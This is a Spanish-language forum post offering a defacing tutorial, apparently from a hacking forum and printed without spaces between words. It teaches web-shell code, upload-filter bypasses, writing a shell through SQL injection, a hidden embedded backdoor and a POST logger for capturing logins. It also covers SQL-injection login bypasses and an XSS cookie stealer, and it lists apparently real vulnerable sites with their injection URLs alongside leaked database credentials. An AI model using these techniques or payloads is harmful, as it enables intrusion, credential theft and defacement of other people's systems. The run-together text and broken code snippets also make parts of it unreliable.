Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
GrantutorialdeDefacing
GrantutorialdeDefacing
en:Septiembre16,2011,10:27:41pm
Holaamigos
Hoyostraigountutorialquehesacadodeunaredsocialdehacking,anunciadaenelforo.
Acontinuacineltutorial
Osvaisacansardeleer
Textos
*1.Tipsalahoradeusarshells+otrascuantascosas
*2.DeartificiosyotroscuentosenSqlinyeccion
*3.AtacandosistemasinformacionwebsbasadosenCookies
*4.PatrondeBugs
*5.CookieStealingenSMF1.1.7
*6.Recopilaciondetoolsdefacing(estoeslounicoqnoes100%mio)
Videos
*Aquiunvideobypasseandounuploaderyentrandoporsqlinyeccion.
ademasdejamosunuploaderembebidohttp://www.megaupload.com/?d=8HX4TMDN
*Subiendoshellasmf1.11,aplicapara2.0oelquesea.Todonetamenteprobadoenlab
http://www.megaupload.com/?d=TB5HN70F
Tipsalahoradeusarshells+otrascuantascosas
0x01Qsonlashells.
0x02PhpShells
0x03CreaciondePhpShells
0x04Subirunashellaunservidor
0x05Yasubilashellyahora?
0x06Preparandoelsistemaparavolver(Keyloggerphp)o(POSTloggerphp)
0x07Dejarshellincrustada(ShellEmbedded)
0x08Preguntasenotrosforossobreestetuto
0x09Conclusion
0x10Agradecimiento
0x01Shell
Aunashellcomotallapodemosdefinircomoelsoftwarequepermitequeelusuarioaccedaalosserviciosdel
sistemasinirdirectamentealkernel,sinoprecisamenteatravezdelashell,enotraspalabraslashellserauna
intermediariaentreelusuarioyelsistema.
0x02PhpShell(WebShell)
BuenoenesteordendeideaspodemosentoncesdecirqueunaphpShellesunintermediarioentreelsistemay
elusuario,conlaparticularidadqueestadesarrolladaenphp,asicomohayshellshechasenphp,tambien
existenenunsinfindelenguajesdeprogramacion,laventajadeqlashellestehechaenphpoenalgun
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
1/16
29/7/2016
GrantutorialdeDefacing
lenguajedeprogramacionparalaweb,esqpodremosusarlashellaprovechandolosserviciosdelamaquina
remota.
enotraspalabrasGraciasaqueenlamaquinaremotaestacorriendounservicio,nuestra(Web)shellse
ejecutaraypodremosvisualizarlaporelnavegador.
0x03CreaciondeunaPhpShell.
Puescomoseimaginaransiquicieramoscrearunaphpshell,loquenecesitariamosfundamentalmentees
conocerafondoellenguajedeprogramacionenelquelavamosadesarrollar,ycrearopcionesdemanejode
archivos,navegacionenelservidoretc,esdecir,todoloquenosfaciliteinteractuarconelsistemaremoto.
unminiejemplodeunashell,quepuedaejecutarcomandosenelservidorseria.
partiendodequeelcomandodephp:system(`dir`)ejecutaelcomandodirenlamaquinadondeestealojado
elarchivo,entoncespodremosdecirqueloharemosparaqueejecutetodoloqueenvienporunnavegador.
comoasi?sipuesporejemplosihacemosunarchivophpconelsiguientecontenido:
Cdigo:[Seleccionar]
php
echo $_GET[`comando`];
loguardamoscomotest.php.locolocamosenunservidorwebquesoportephp(podrianhacerloenunofreeo
localmenteparaprobar)yaccedemmosalarchivoporelnavegadorasi
www.dondeestemontado.com/test.php?comando=Hola
elresultadoquenosdebearrojarelservidoressimpemente:Hola
puesloqueledecimosesqconGEToseahacereferenciaaloqviajeporlaurl(pordecirlodealgunmodo)y
solodecimosqueescribaloqllegoencomando.
simodificamoseltest.phpporalgocomoesto
Cdigo:[Seleccionar]
php
system( $_GET[`comando`]);
loqueharaseraejecutarelcomandoqleenviemosporlaurl
porejemplosimandamosalgocomoestoenlaurl
www.dondeestemontado.com/test.php?comando=dir
seejecutaraundirenelservidor.
tambienpodriamoshaceralgoasi:
Cdigo:[Seleccionar]
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
2/16
29/7/2016
GrantutorialdeDefacing
php
show_code( $_GET[`comando`]);
Cdigo:[Seleccionar]
www.dondeestemontado.com/test.php?comando=index.php
conloquevisualizaremoselcodigodeindex.php.
comoven,conestearchivophpestamosdeciertaformacomunicandosconlamaquina.asiquedigamosqeste
eselprincipiobasicodeunashell.Actualementeencontrarasshellsfamosascomoc99,c100,r57...entre
muchasotras,queyacuentanconsistemascompletoparasaltarsemuchosfiltros.sonfacilesdeencontrar.
simpementesiquierenalgunasdelasqlesdigocoloquenengoogle:
inurl:c99.txt
0x04Subirunashellaunservidor
Cuandosetratadeatacarunservidorweb,loqueunoprincipalmentebuscadeciertaforma,estratardecolar
unaphpshell,paraque?puesparatenermasaccesoalservidoreirporlainformacionquenosinteresa.
oseaqueyaseimaginaranquenecesitanunespeciedeuploadingoexplotaralguntipodebugquepermita
subirarchivos.partiendodeeseprincipiobasicoseimaginaranquesicolocamosdigamosengoogle
inurl:upload.php
encontraremosmuchosuploadingparaprobarhabersipodemoscolarunaphpshell.
meheencontradoconmuchaswebsquenofiltranlasextensionescorrectamenteloquenospermitesubir
archivosdeformaarbitraria,esoesalollamamosArbitraryfileUpload,esasicomopodemossubirunashell,
sintantodesmadre,yconpocoesfuerzo.
aprovechoparacontarlealgoqmesucedio,duranteeldefaceaelinformador...noteeunprincipioqteniablind
sqlinyeccion.puescomoalgunossabranesetipodeinyeccionsonalgotediosas...tardamosmuchoendar
conelresultadoquequeremosyavecesteniendoencuentaqprobablementenocorramosconsuerte.
entoncespsestabatrantandodehacerlacuandomedioporprobarencontrarelpaneldeadmindelawebque
estaubicadoen:
http://www.elinformador.com/admin/
metopeconunasorpresacuandoviquehabiaunuploaderparaimagenes,asiqueprobesubirunashell.
ypuesmedioresultado...mesorprendiunpocoeinclusivemedioalgoderisa,puesdeblindsqlinyecciona
tenerunuploadinglisto...ysinningunesfuerzopuesjum...nosahorramosbastante.
deestaformasubilashelldelinformador(queaunestaonline).
porotrolado,hayalgunostiposdefiltrosqnospodemossaltar,porejemploavecesusancosascomo
Cdigo:[Seleccionar]
php
if(strpos($HTTP_POST_FILES[`file`][`type`],"jpg"))
aquiloquehacenesmirarloqvieneenelcampotypedelacabecerahttp,paraobtenereltipodelarchivo,si
strposencuentraeltipodevuelvelaposicion,sinodevuelveunfalso...comotodossabranpodemosmodificar
lascabecerasparacambiareltipo,puedenusarelhttpliveheader,achilles,tamperdata...porotrolado
podemosencontrarnosconestafiltracion.
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
3/16
29/7/2016
GrantutorialdeDefacing
Cdigo:[Seleccionar]
php
$tipo=explode(".",$nombreFIle);
if($tipo[1]==`jpg`){
echo "paso";
}
conloquesolobastariasubirlashellconunnombrecomoesteshell.jpg.php,porq?porq
explode(`.`,`shell.jpg.php`)
parteelnombreenunvectorytomael.comoreferencia,portantolaposicion1tienejpgyla2tienephp.yal
compararsoloconla1entoncesalparecerseriaunjpg.
habercomoquemonosenestecontexto,notenemosningunuploading,solotenemosunsqlinyeccion,yno
tenemosadminloginninada.cuantoestopasa,podemosintentarfiltrarunashellconlasetenciaoutfile
podriaseralgocomo:
Cdigo:[Seleccionar]
union+select+,1,2,` system($_GET[cmd]); `+into+oufile+ruta/shell.php
sinosponemuchajoda..podemosintentarpasarelcodephpahexparafiltrarla.
TambienpodemossubirunarchivoconPUT,bajolacondicionqueelphpiniesteconesto
Cdigo:[Seleccionar]
allow_url_include = On
allow_url_fopen = On
teniendoelputactivadopodemosenviarenlacabecerahttpalgocomo
Cdigo:[Seleccionar]
ypodremossubirshell.
0x05Yasubilashellyahora?
Unavezquelogremostenerlashellarriba,unodelostipsocosasquepodemoshaceresbuscarlosarchivos
deconfiguraciondelaBD,paraque?puesparausmear,oparadumpearla,comoasidumpearla?puesveranes
simplementedescargarnosunacopiadesuBD,enparticularlasshellstienenopcionesparalosarchivosq
lista...comoverdescargareditaretc.
ejemplo
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
4/16
29/7/2016
GrantutorialdeDefacing
ahorausmeandounpocoencontramoslosarchivosdeconfiguracion,inclusivenotamosquenuestrashellnos
loindica.
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
5/16
29/7/2016
GrantutorialdeDefacing
siloclickeamosnosdarainformacioncomoesta:
Cdigo:[Seleccionar]
$user_db = `i1n1f3o4_admin`; // Server Username
$pass_db = `infor2005`; // Server Password
$host_db = `localhost`; // Server (e.g. localhost)
$db = `i1n1f3o4_encuesta`; // Database to be created or name of existing database (Please note: Database containing dashes cann
conloquenospodemosautenticaraqui.
Buenounavezcoloquemoslosdatos...dehost,Bduserypassword,podremosvisualizaralgocomo:
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
6/16
29/7/2016
GrantutorialdeDefacing
laopciondumpeslaqueleshabiamencionadopreviamente,ypuespodrannavegarenlabd...hagande
cuentaqueesunclientemysql.
lashelltieneopcionesparahacerbackconection.
paraquesirve?puesparabypasearelcortafuegos,podemosleerarchivosyaseausandophpomysql...
podremoshacerunsinfindecosas,yoaconsejoquelebrujeenalashellojalalalamontenlocalmente,y
ensayanlasopciones.quepuessonbastanteintuitivas.
0x06Preparandoelsistemaparavolver
Buenopueslaideaesqueunavezentramos,dejemosaseguradounproximoregreso,porelloestaesunade
lastantasopciones,setratadeguardarenunlog(quepodriaserremotoperoqueaquilodejodeformalocal),
estosepuedeubicarenelarchivophpencargadoderecibirlosdatosdellogin
Cdigo:[Seleccionar]
php
foreach($_POST as $index => $valor){
$log="[in]".$log.$index." = > ".$valor."[in]
";
}
$logFile= fopen(`logs.txt`, `a`);
fwrite($logFile, $log."n");
Ahorapodremosverloqueguardeellogenlogs.txt,aclaroqesunejemplosimple,sepodrianhacercosas
comoconexionporftp...etc.ysieladminquieredarsecuentaqueledejamosunkeylogger(seriamasun
POSTloggeroalgoasi),puestendriaqueirarevisarelcodigofuentedesuaplicacion.
0x07Dejarshellincrustada(ShellEmbedded)
setratadeagregarlashelldentrodeunarchivoexistente,conelfindeevitarsumararchivosalservidor,soloes
cuestiondeencontrarelarchivoindicado,yacomodamoslaminishellparaquesoloreaccionesienviamosun
parametroasi
Cdigo:[Seleccionar]
php
if($_GET[`activeshell`]==`activar`){
system( $_GET[`comando`]);
}
estoconelfindeevitarqsalganerrores...qadviertanquehayproblemasenelarchivo
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
7/16
29/7/2016
GrantutorialdeDefacing
yloejecutariamosasi
www.dondeestemontado.com/test.php?comando=dir&activeshell=activar
Buenoaquiacabaestelistadodetips...ydeteoria...esperelesguste.
0x10Conclusiones
Nadasolorestadecir,siquieresatacaralgolamejorherramientaessabercomofunciona,asitendrasmas
posibilidades
2.DeartificiosyotroscuentosenSqlinyeccionby_4nd33xd_
0x01SqlInyeccion
Primeroquenada,puesconoceraqueseledenominainyeccion:esaquelcodigomaliciosoqueesmezclado
conunasetenciasqlnormal,conelfindealterarlaintencionnormaldelasetenciasql,ylograrunefecto
diferente.dichoefectopuessimplementeconsultaralgundatoespecial,oinsertaralgundatoespecial,inyectar
unarchivoetc.
0x02Introduccion
Paraestearticulovoyasuponerquequienloleatieneunconceptobasicodeloqueesinyeccionsql,yqueal
menossabeinyectarenunasituacionnormal.Buenolaideaescontaralgunaexperienciascreandoinyecciones
sql,endiferentescontextos,yanalizandodichassituacionesparaverificaralgunasposiblesvariantes.
Ciertodia,necesitabaentraraunsitioweb,yaqueeneseservidorseencontrabaunawebobjetivo,no
necesariamenteparadefacear,simplementeobjetivo.Buenopueshaciendounreversediconunawebquetenia
eltipicosqlinyeccion,construilainyeccion
resultoseralgocomo:
Cdigo:[Seleccionar]
+union+select+1,user,password,4,5,6,7,8,9,10+from+usuario+limit+5,1
buenoymetirouneluseryelhashasi
Cdigo:[Seleccionar]
edwinc:13dd3a9725dba7a9
hastaahi,todonormal,lomaloeraquenoteniauncrackeadornieldicamanoparacrackearesetipodehash,
asiquefuialpaneldeladministrador
ensayeunusuarioslkdjfljdsf,yelresultadofuedeciaqueelusuarionoexistia.
biendespuesmetielusuarioedwinc,ymedeciaqueelpassnoeraelcorrecto,porlocual,eramuyprobable
quelaconsultadellogueoestubieraensentenciassqldiferentes,intentesinanalizareltipico`or1=1,pero
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
8/16
29/7/2016
GrantutorialdeDefacing
nofunciono,sinembargomearrojoalgunoserroresdesql.
entrelascosasquevienelerror,seveiaquelaconsultaqueintentabanhacerinternamenteera:
Cdigo:[Seleccionar]
select password(`passdigitado`) as cryptado
oseaqueposteriormentemesupusequeelparametrocrytadoestaconsultado,ycomparadoposiblementecon
loarrojadoenlaprimeraconsultaquesoloverificabaelusuarios.Comoasi?puesbienmetiuna`enellogin
paraquemearrojaraelerrordelaprimeraconsultayefectivamentehacianalgocomo
Cdigo:[Seleccionar]
select * from usuarios where user =`usuariodigitado`
conloquemihipotesis,sevolviomasprobable
asiquesimplementeloquedebiahacereracolocarenelparametrocrytadoelvalordelhashdelusuarioque
puseenellogueo:asiqueelbypassmevinoquedandoasi
login:
Cdigo:[Seleccionar]
edwinc
password:
Cdigo:[Seleccionar]
aku`),`13dd3a9725dba7a9` as cryptado /*
tambienesimportanteaclararelconocercualcomentarioeselqrealmentefuncionaparaelbypass,paramies
partefundamental,loqueyoregularmentehagoparadarmecuentadeestoes,primerometerun`para
verificarquetireerror,despuesprobar``paraprobarqpodemoscerrarcomillas,ydespuesprobar
Cdigo:[Seleccionar]
/* `
-- `
# `
sabremosqnossirve,porqnotiraraelerrorqsaliocuandocolocamos`deestamanerasabremoscual
comentariodebemostenerencuentaparabypassear.
yhappyhacking
....
Talvezestaidea.puedaaplicarseatiposdeautenticacionqueusan2setenciassqlparaellogueo,yquetiene
sqlinyeccion,yademasdamosconunpasspococomun.Aunqueenestecasosetratosobreuncotextomuy
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
9/16
29/7/2016
GrantutorialdeDefacing
especifico,talvezexistansimulitudesenotrasaplicaciones.
0x03Elpeligrodeusarinadecuadamentelike
Buenopuesestosucedioconunaaplicacionweb,jsf+oraclesetrabaqueduranteellogueoseconsultaba
usandolafuncionlike,comomuchossabranlikeesusadoparabusquedasdepalabras,peronopara
comparacionesexactas,conlocualsabemosqueenviandoun%seharalaconsultadeformageneral,
basicamenteesuncomodin,porlocualsiunaaplicacionrealizaautenticacionesdetipo:
Cdigo:[Seleccionar]
php
$query="select * from usuarios where login like(`".$_POST[`login`]."`) and password like(`".$_GET[`password`].`"");
//silaconsultavienellenapasa
podremosbypassearlasimplementeenviando%tantoenellogincomoenelpassword,osinecesitadeun
usuariovalidoseriacuestiondetenerelusuariovalidoymandardepassword%.
porotrolado,sinecesitamosconocerlosdatosdeautenticacioncorreectos,yellogueonotieneencuentael
numerodeintentos,podemosrealizarbusqdasgeneralizadasparadarconlosdatos
preguntamosasi:
hayunloginqcontengalaletraa?
Cdigo:[Seleccionar]
login: %a%
password:%
sisi,pasa,sino,nologuea
hayunloginqcontengaac?
Cdigo:[Seleccionar]
login: %ac%
password:%
hayunloginqcontengalaletraad?
Cdigo:[Seleccionar]
login: %ad%
password:%
yasi...sepodriacodearunaexploitparaqueaprovecheesebugyencuentrelosdatoscorrectos,dadoelcaso
dequenecesitemoslosdatoscorrectosparaprobarquizasenelftpoenelemail.
3.AtacandosistemasinformacionwebsbasadosenCookiesby_4nd33xD_
0x01Introduccion
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
10/16
29/7/2016
GrantutorialdeDefacing
0x02Quesonlascookies
0x03Arquetectura
0x03Tecnicaspararobodecookies
0x04InyecciondeCookie(crossdomaincookiespoofing)
0x05BruetandoCookiesconpocoscomponentes
0x06CookieHandling
0x07Conclusione
0x08Agradecimientos
0x01Introduccion
Lamayoriadelossistemasdeinformacionanivelweb,actuales,utilizanmetodosdeautenticacionbasadosen
sistemasdecookies,sinembargoavecesnonosdetemosapensarqueunamalagestiondecookiespuedeser
motivoparaexponerlainformaciondenuestrosistemas.Inclusivepodriadecirquemuchoswebsitebasansu
sistemaseseguridadencookies.
Buenoantesquenadalaideadeltutorialesplantearalgunosmetodosdeatacarsistemasdeinformacionque
basensuseguridadencookies.Asiqueempecemosconsaberqueesunacookie.
0x02Quesonlascookies
Lascookiesesalafinalunconjuntodedatosquepermiteaunservidoridentificardeciertaformaunvisitante.
Einclusivedecidirapartirdeestainformacionquesetratadeunusuariodelsistema,lascookiesson
almacenadasennuestrodiscoduroenelcasodeunsistemawebelnavegadoradministralascookiesy
garantiza"Enteoriaciertasreglas",porejemplo,unnavegadordebegarantizarqueeldominioalque
pertenecenunascookieseselunicoquepuedemanipularlascomotal.buenodeestoyahablaremos...
debemostenerencuentaquelascookiestienenvariosparametrocomoloson:
[]Nombredelacookie
[]valordelacookie
[]fechadeexpiraciondelacookie
[]dominioalaquepertenece
[]pathdondeseencuentraactivalacookie
Yaquevamosamanipularcookies,personalmenteusooperaparaadministrarlascookiesmanualmente,o
simplementeporelnavegparacrearunacookiepuedencolocarenelnavegador
Cdigo:[Seleccionar]
javascript:document.cookie =`nombreCookie=valor expires=Thu, 30 Aug 2009 20:47:11 UTC; path=/`
0x03ArquItectura
Seteodecookies:
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
11/16
29/7/2016
GrantutorialdeDefacing
Estaeslaideaquedejoplanteada,queessobrelaquesebasaeltutorial.
0x04Tecnicaspararobodecookies
UnadelastecnicasmasconocidaparaelrobodecookiesesaprovecharunXSS,queconsisteeninyectar
codigojavascriptohtmlenelnavegadordelclienteatravezdelavulnerabilidaddeunaweb,yprobablemente
conelfindeobtenerlascookiesdelmismositiowebvulnerable.estavulnerabilidadconsisteenquenosefiltro
correctamente
Cdigo:[Seleccionar]
php
echo $_GET[`mensaje`];
enestecasonosefiltr?elparametromensaje.siquicieramosatacarunawebconestecodigo,podriacrearun
iframeenotroserverquenosguardelacookies
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
12/16
29/7/2016
GrantutorialdeDefacing
loquehaceeseiframees,cargarlawebvulnaprovechandoelxssqueviajaporgetparaqueenvielascookiesa
elserverAtackquevendriasiendodondetenemosnuestrocookieStealer.
elcookieStealerdelquehablosoloesunscriptqueguardaloquevengaporelmetodogetenunarchivo
aquidejoelcode...estasencillo...lohevistoenmuchosladosporesonosedequienesecodexD
Cdigo:[Seleccionar]
php
$cookie = $_GET[`datos`];
$handler = fopen(`datos.txt`, `a`);
fwrite($handler, $datos."
");
Buenoesetipoderobodecookiesfuncionacuandosetratadeunxssporget,enelcasodelosxssporpostes
algomascomplicado.digamospuesunsimplelinknopuedeenviarporestemetodo.Tampocopodemos
pensarenenviarellainformacionpostusandophpdesdeelserver,puesnohariamosnada...yaque
necesitamosesquenuestravictimaenvieesosdatosparalograrelresultado.podriamostratardehacerlocon
unform,enviandolosparametrosnecesarios,aunquesegunesoestariamoshablandoqueelusuariodeberia
presionarenunboton,paraellopodriamospensarenalgunmetodojavascriptquehagaunsubmitdel
formularioypodamosenviarlo.
Segunloquehastaahorahemoshablado,planteamosqueenteorianoesposiblequedesdeundominioxse
inyectecodigoparaextraercookesdeundominioy,salvoelcasoqueelnavegadorseavulnerableaestetipode
extracciondecookies.Enotraspalabrasloqueintentoplantearesquecomolaadministraciondecookiestiene
suladofuerteenlosnavegadores,dependemosdeestos.
0x05Inyeccionde(crossdomaincookiespoofing)
Estevulnerabilidadsepresentacuandounnavegadorpermitedesdeundominiodigamos
www.ilegalintrusion.netcrearunacookiecondominiodewww.er00t.org,deestaformapodemosinyectar
cookiesenelnavegadordelclienteconlafinalidaddecrearunregistrosidconocidoporelatacante,unavez
queelusuarioselogueeenelsistema,elatacantetendraunsidconocidoyademasautenticadoenelsistema,
conloquetendremosunasessiondeusuario.IE6contodoslosparchesesvulnerableaesteataque,yotros
navegadoresenversionesanteriores.
estuveleyendoporahiunpaper(yanorecuerdobiendequiencreoqdehkm),enelqueseplanteaque
podemosfalsificarundominio,oseasiendowww.ilegalintrusion.netpodemoshacernospasarporwww.e
r00t.orgusandoalgunatecnicayaseadeDNSSpoofing,otansencillocomodecirqueenmireddearealocal
pongodenombreamimaquinaqueantessellamabailegalintrusionEr00t,deestaformafiguroconese
nombreloqueenteorianospermitirainyectaruncookiecondominioer00t.
lapreguntaescomocreolacookie?puescomoyadijeanteriormentelapodemoscrearejecutandoese
javascript,olapodemoscreardirectamentedesdephpusandolafuncionsetcookie.
Cdigo:[Seleccionar]
setCookie(nombre,$valor,$date,$directorio,$dominio);
seestaformanosquedaunvector$_COOKIE
0x06BruetandoCookiesconpocoscomponentes
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
13/16
29/7/2016
GrantutorialdeDefacing
Partiendodequetengamosunsistemaquebasesuseguridadencookies(comomuchos),yquelacookie
tengapocoscomponentes.unadelascosasquepodemosintentarhaceressimplementetratardeadivinarla
cookie,lointerensantedebrutearunacookie,esquecasitodoslossistemaspermitenensayarcuantocookie
senosdelagana,yqueconobtenerunacookieescomosidieramosconelusuarioyelpasswordaltiempo.es
decirunacookieesunareferenciaquetraeenlamayoriadelasocasioneslaalusionaunusuario.hecodeado
unatoolquenospermitebrutearcookies.
Cdigo:[Seleccionar]
php
define(NAMEFILE,"cookies.html");
echo "
######################################################################################
#Cookie Brute Force by _4nd33xD_ #
#Usage php cooker.php http://www.website.com/path/index.php cookieName dict.txt#
#Gretz M@ndrake Black Team White-Shadow,Safety Last Group #
######################################################################################
";
$host =$argv[1];
$cookieName=$argv[2];
$dict =$argv[3];
if(empty($host) || empty($mode) || empty($cookieName) || empty($dict)){
echo "verifique parametros";die();
}
Lascookielastomadeunarchivodetexto,estebruteforcenotienenadadelotromundo,lointeresanteserala
formaenquesecreeelarchivodecookies,puesesodependeradelanalisisqueleharemosaloscomponentes
quetenganqueverconlacreaciondecookies.
0x07CookieHandling
AvecesseintentaGuardarinformacionvitaldeunusuarioenlascookies,esteesunerror,puestoquelas
cookiepuedenseralteradasfacilmente,cuandoalteramosunacookieparamanipularelfuncionamientodel
sistema,esaloqueseleconocecomoCookieHandling,
porejemplosupongamosquetenemosestaautenticacion:
Cdigo:[Seleccionar]
php
if($_COOKIE[`admin`]=`true`){
echo "Usuario autenticado";
}else{
echo "Bienvenido visitante";
}
estetiposcriptestotalmentevulnerableaunamanipulaciondecookie,bastaconcambiarelvalordelacookie
denombreadminatrueparaqueelusuarioseaautenticado.
lescuentoqueenunaocasionmetopeunawebqueponiadecookieelloginyelpassword...puesyase
imaginaranquesignificaeso,porunladoaunquevalidenellogincontraunbruteforce,podemoshacerloporlas
cookiessinproblema,ademasdequeunrobodecookiesseriacatastroficopuestendriamosnetoelloginyel
password,yaesolesumamosquevalidabanesascookiescontralabasededatossinmirarloquevenian
algocomo
Cdigo:[Seleccionar]
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
14/16
29/7/2016
GrantutorialdeDefacing
php
$query="select * from usuario where $login=`$_COOKIE[login]` and password=`$_COOKIE[`password`]`";
aloquebastariaconfijarlacookiedenombrelogina1`or1=1
Cdigo:[Seleccionar]
select * from usuario where $login=1` or 1=1 --
yhappyhacking
0x08Conclusione
Puesprimerotenerencuentaqueundescuidodeelfiltradodecookiesnospuedetraermuchosdoloresde
cabeza,porotroladonotamosquelascookiesquetienenlainformacionnetasinninguntipodeencriptacion
sonfacilmentemanipulables.Tenerencuentaademasqueseriaidealnobasartodonuestrosistemade
seguridadencookies.Lacantidaddecomponenteenunacookieinfluyenenlacomplejidaddelamisma,loque
hariareducirlaprobalidaddeataques.
4.PatrondeBugs
Dequesetrata?
Saludosgentebuenoparaquienesseestaniniciandoeneldefacing,puesqueriaaportarlesestainformacion,he
encontradounpatrondebugsenalgunosdesarrollosanivelweb,comoasipatrondebugs?sipuesveranA
vecescuandoseencuentraunbugcualquiera,esbuenomirarlacasadedesarrolloqueimplementoelsistema,
porq?puesporqsicometioeseerrorunavez,esprobableqtenganeseerrorenmuchasdesusaplicaciones,
esaloqdenominopatrondeerroresodebugs,obuenonosesitengaotronombre,peropsesmasomenos
eso.
Patrones.
Mehedadocuentaqcasitodaslasaplicacioneswebde:
"PoweredbyForamen"Tienensqlinyeccion
Ejemplo:
http://www.analesdemedicina.com/cardiologia/noticia.php?noticia=82071+union+select+1,@@version
nosiempreesenelmismocomponenteperosivaporelmismolado.
Igualsucedecon
poweredbyMaiku
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
15/16
29/7/2016
GrantutorialdeDefacing
http://www.otakunomichi.com/ver_articulos.php?
articulo=11+union+select+1,2,concat(table_name,0x3a,column_name)+from+information_schema.columns+limit+170,1
poweredbyNaranjaAzul
http://www.ministeriostorrefuerte.org/eventos.php?codigo=15`
http://gt.unmejorempleo.com/ofertas.php?id=1862`
Poweredby:Peruwebmedia.com
http://www.ciclismoperu.com/ver_titular.php?codigo=101&id=1`
http://www.disarva.com/vercategoriaquickbau.php?idmarca=12&id=55`
Deestaultimasiqhaywebs.meencontrebastantes.
Sqlinyeccionen
dork:inurl:php?id="PoweredbyKrtera"
Buenosolosetratadeesto,=amedidaqencuentrepatrones,puessepodrianirpublicandoaquimismo.nose
qtallessuenelaidea,yadepuesmiramossisereportanoquehacemosconeso.
5.CookieStealingenSMFby_84kur10_
[/color]
Buenoparaestetutoesnecesarioqueconozcanlateoriabasicasobrelosxss,ysobrecookies.
definicion:http://es.wikipedia.org/wiki/Cross_Site_Scripting
XSS
XSS,delinglsCrosssitescriptingesuntipodeinseguridadinformticaoagujerodeseguridadbasadoen
laexplotacindevulnerabilidadesdelsistemadevalidacindeHTMLincrustado.
quepermitieraejecutarcdigode"scripting",comoVBScriptoJavaScript,enelcontextodeotrodominio.
Fuente:http://hackingsocial.socialgo.com/magazine/read/defacing_24.html
https://foro.hackxcrack.net/defacing/grantutorialdedefacing/
16/16